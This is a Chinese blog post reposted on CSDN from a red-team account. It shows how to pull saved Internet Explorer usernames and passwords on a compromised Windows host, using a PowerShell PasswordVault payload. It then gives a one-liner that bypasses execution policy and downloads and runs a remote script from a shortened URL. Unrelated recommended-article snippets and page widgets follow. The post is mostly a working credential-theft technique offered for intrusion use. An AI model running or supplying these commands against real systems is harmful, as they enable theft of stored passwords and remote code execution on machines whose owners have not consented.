浏览器获取设备信息_一条命令获取 IE 浏览器保存网站的账号和密码信息

最新推荐文章于 2024-01-25 14:36:36 发布
最新推荐文章于 2024-01-25 14:36:36 发布
阅读量742 收藏 2
点赞数
文章标签: 浏览器获取设备信息
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_36217616/article/details/113366025
版权
本文介绍了如何利用PowerShell从IE浏览器中获取已保存的账号和密码信息。通过执行特定的PowerShell命令,可以访问到浏览器的缓存数据,从而检索账户密码。参考链接提供了更多详细信息。
摘要由CSDN通过智能技术生成

渗透攻击红队

一个专注于红队攻击的公众号

95558e6c2a197e9234e423f8406a21bb.png

大家好,这里是 渗透攻击红队 的第 41 篇文章,本公众号会记录一些我学习红队攻击的复现笔记(由浅到深),不出意外每天一更

d5156709077c891351d4fbaddff2bf94.gifPowershell

内网渗透一直以来都是一个热门话题,试想在一个大型的内网环境下,当我们拿到了内网windows机器后,我们该如何通过他们去获取更多的所需资源,这就需要我们进行内网渗透了。然而在内网渗透中,除了kali、metasploit等高能的存在以外,还有一款神器也常常容易遭到忽略----PowerShell

Powershell 获取 IE 浏览器的账户密码信息

Powershell

首先需要的是一段 Powershell Payload:

[void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime]$vault = New-Object Windows.Security.Credentials.PasswordVault$vault.RetrieveAll() | % { $_.RetrievePassword();$_ } | select username,resource,password

我们可以把他放到公网上,这里有老外现成的了:http://bit.ly/2K75g15

723f933f398f888006f2c529f81ff5ed.png

如果你不想用它的域名,你也可以把 Powershell Payload 放到你自己的公网服务器上,然后使用 Powershell 调用它即可:

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://bit.ly/2K75g15')"

0ef6f4c0621db27b5abb32ad234b53eb.png

这个时候就能获取到你 IE 浏览器中的缓存信息,查找你保存的账户和密码信息。

参考文章:

https://github.com/HanseSecure/credgrap_ie_edge

49155e14a1a63b61fa01e478284b9e27.png

渗透攻击红队

一个专注于渗透红队攻击的公众号

4a4e6c1358b511f5d557a9ae8a357553.png f03c6aa924463d1a88f3fb5f45b98cb0.png点分享 bd2d71619bb687e850b9630f73cb609d.png点点赞 0cea81b95bd93c17eaa6bfc897887eb1.png点在看
左钧来
关注
浏览器指纹扫盲贴:浏览器指纹修改,浏览器指纹伪装,浏览器指纹获取都是什么意思?
amazon20201212的博客
03-25 854
什么是“指纹”? 看过警匪片或者破案小说的人,应该都知道“指纹”在刑侦中的作用——警方虽然没有直接看到犯罪现场的作案人员,但可以根据现场留下的指纹来猜测/判断作案人员。 如果你时常接触信息安全领域的一些资料,也会听到“指纹”这个形象的说法(比如:操作系统指纹、网络协议栈指纹、等等)。IT 领域提到的“指纹”一词,其原理跟“刑侦”是类似的——“当你需要研究某个对象的类型/类别,但这个对象你又无法直接接触到。这时候你可以利用若干技术来获取该对象的某些特征,然后根据这些特征来猜测/判断该对象的类型/类别。”   
web前浏览器篇——http协议知识汇总
it66682的博客
05-25 1047
Accept-Charset:浏览器可接受的字符集 User-Agent:告诉HTTP服务器,客户使用的操作系统和浏览器的名称和版本 Content-Type:例如:Content-Type: application/x-www-form-urlencoded。 Connection:例如: Connection: keep-alive 当一个网页打开完成后,客户和服务器之间用于传输HTTP数据的TCP连接不会关闭,如果客户再次访问这个服务器上的网页,会继续使用这一条已经建立的连接。HTTP 1.1默
html、JS获取移动设备标识信息(适用于投票)
03-08
由于现在隐私保护问题,不允许获取设备的IMEI和MAC地址,因此找出来这么一个方案,适用于做各种投票时获取设备的标识信息,虽然不具有绝对的唯一性,但是应对普通的需求完全够了,本代码不需要引用任何文件,粘贴即可使用,在上万级的投票收集项目中应用过,亲测有效且未发现问题。现贡献出来,只为换点C币,供我下载点别的资源,谢谢各位捧场。
获取设备网页/设备屏幕信息,全!
bangman4009的博客
03-05 170
<script type="text/javascript"> function loadW() { var scale=window.devicePixelRatio; var s = ""; s += "网页可见区域宽:" + document.body.client...
获取设备信息
qq_31942467的博客
04-29 276
NSString *key = @"CFBundleShortVersionString";  NSString *currentVersion = [NSBundle mainBundle].infoDictionary[key]; [[[NSBundlemainBundle] infoDictionary] objectForKey:@"CFBundleShortV
获取浏览器硬件资源的媒体数据(拍照、录音、录频、屏幕共享)
在下是小白的博客
02-24 1791
如果浏览器无法找到指定的媒体类型或者无法满足相对应的参数要求,那么返回的 Promise 对象就会处于 rejected[失败]状态,NotFoundError作为 rejected[失败]回调的参数。此属性可以用来指定上面两个属性. 如果上面两个属性只有其中之一和此属性被指定,则此属性可以用于设定另外一个属性。该事件可用于获取录制的媒体资源 (在事件的 data 属性中会提供一个可用的 Blob 对象.)该事件可用于获取录制的媒体资源 (在事件的 data 属性中会提供一个可用的 Blob 对象.)
APP内打开网页获取设备相关信息
haonan_z的博客
12-06 2909
利用navigator.userAgent获取设备相关字符串,通过关键字匹配判断设备信息 是否是苹果手机:!!u.match(/iphone/i) || u.match(/Ipad/i) 是否安装手机:!!u.match(/android/i) 是否是在微信中打开的网页:!!u.match(/micromessenger/i) 获取设备类型(例如手机类型):u.substring(u.indexOf(’(’)+ 1, u.indexOf(’)’)) // 各主流浏览器 function getBrow
php中使用cookie来保存用户登录信息的实现代码
12-19
在PHP中,使用Cookie来保存用户登录信息是一种常见的方法,特别是在小型网站或应用程序中,它可以帮助简化用户身份验证过程。下面我们将深入探讨如何通过提供的代码片段实现这一功能。 首先,我们有`connectvars....
2023高薪前面试题(一、前基础——HTTP/HTML/浏览器
iaz999的博客
04-29 3217
语义化就是构成HTML结构的标签要有意义。比如有这样的标签:header表示页面头部main表示页面主题footer表示页面底部那么这些标签构成的HTML结构就是有意义的,也是语义化的。​ 如果说页面的头部、主体以及底部都用div来表示,那么他就不是一个语义化的HTML结构了。
WebDriver操作浏览器以及浏览器页面元素的方法
baiyueguiren
03-18 1957
上篇文章是讲了WebDriver定位元素的方法,这篇文章就要讲操作了,本文内容篇幅可能会比较长,一个是因为要操作的项目比较多,另一个是我会将完整的代码放进来,总体原则上我还是追求尽量细致一些,以便能方便读者理解。 控制浏览器 WebDriver主要提供了操作页面上各种元素的方法,同时它还提供了操作浏览器的一些方法,如控制浏览器的大小,操作浏览器前进或后退等。 1.控制浏览器窗口大小 如下图,通常自动化操作谷歌页面时,默认打开的页面不是全屏,这个时候,如果你觉得屏幕分辨率不够,或者太大,你可以通过两个方法来控
浏览器环境下如何获取操作系统硬件信息
qq_34754747的博客
01-13 4517
需要在浏览器环境下获取用户cpu、显卡、主板、硬盘和内存信息,请问用什么方法获取?如果不可行的话,为什么? 必须使用activex外挂软件的方法才能获取,之所以不可以,是浏览器本身功能的局限和限制。 功能局限 功能越少,越容易被设计为跨平台。如果你要获取cpu 显卡主板 硬盘,必然要和操作系统打交道,和硬件打交道,需要特定的本地程序,那么手机、机顶盒、电子书阅读器怎么访问你的网站。 安全性:浏览器不允许网站直接访问客户的硬件,甚至关键文件和执行程序,否则恶意网站可以随意操作你的电脑,多恐怖。.
H5网页获取访问设备信息
热门推荐
jlqf463607624的专栏
04-11 1万+
<!DOCTYPE html> <html xmlns="http://www.w3.org/1999/xhtml"> <head runat="server"> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>测试入...
手机网页获取手机设备信息-陀螺仪
最新发布
qq_44874004的博客
01-25 898
背景:需要在网页获取手机的陀螺仪信息,用于控制相机视角的移动。
js判断终不同跳转不同网址
qq_38388578的博客
12-03 408
var browser = { versions: function() { var u = navigator.userAgent, app = navigator.appVersion; return { trident: u.indexOf('Trident') ...
浏览器获取用户设备信息_微信网页授权 获取用户信息
weixin_39997795的博客
12-02 1103
1.第一步 首先判断是否有codevar ua = window.navigator.userAgent.toLowerCase();// ua.indexOf('micromessenger')为真-微信,如果为假,就是其他浏览器if (ua.indexOf('micromessenger') > -1) {// 判断有没有code 没有就获取codeif (!this.parse_ur...
chrome浏览器本地信息获取与设置
hly15555307663的博客
02-22 910
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Mar
php获取访问设备信息,如何通过JS获取访问设备信息的方法
weixin_32557787的博客
04-03 578
本文将介绍获取访问网页设备的基本信息的方法,提供完整代码及例子,方便大家使用。1.获取访问者IP及所在地javascript获取访问者IP及所在地document.write("IP: " + returnCitySN['cip'] + "地区代码: " + returnCitySN['cid'] + "所在地: " + returnCitySN['cname']); 输出:IP: 61.140...
获取当前系统所有用户的谷歌浏览器密码
weixin_44216796的博客
02-08 1806
获取当前系统所有用户的谷歌浏览器密码 0x01. 知识简介 1、DPAPI: 全称Data Protection Application Programming Interface Windows系统的一个数据保护接口 主要用于保护加密的数据,常见的应用如: Internet Explorer,Google Chrome中的密码和表单 存储无线连接密码 远程桌面连接密码 Outlook,Windows Mail,Windows Mail等中的电子邮件帐户密码 内部FTP管理员帐户密码 共享文件夹和资源访问密
浏览器 session的存储及获取
Missbelover的博客
11-19 3492
session 在浏览器的存储 window.sessionStorage["signId"] = res.data.id; session 的读取 var signId= sessionStorage.getItem("signId"); 清空 window.sessionStorage["signId"] = '';
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值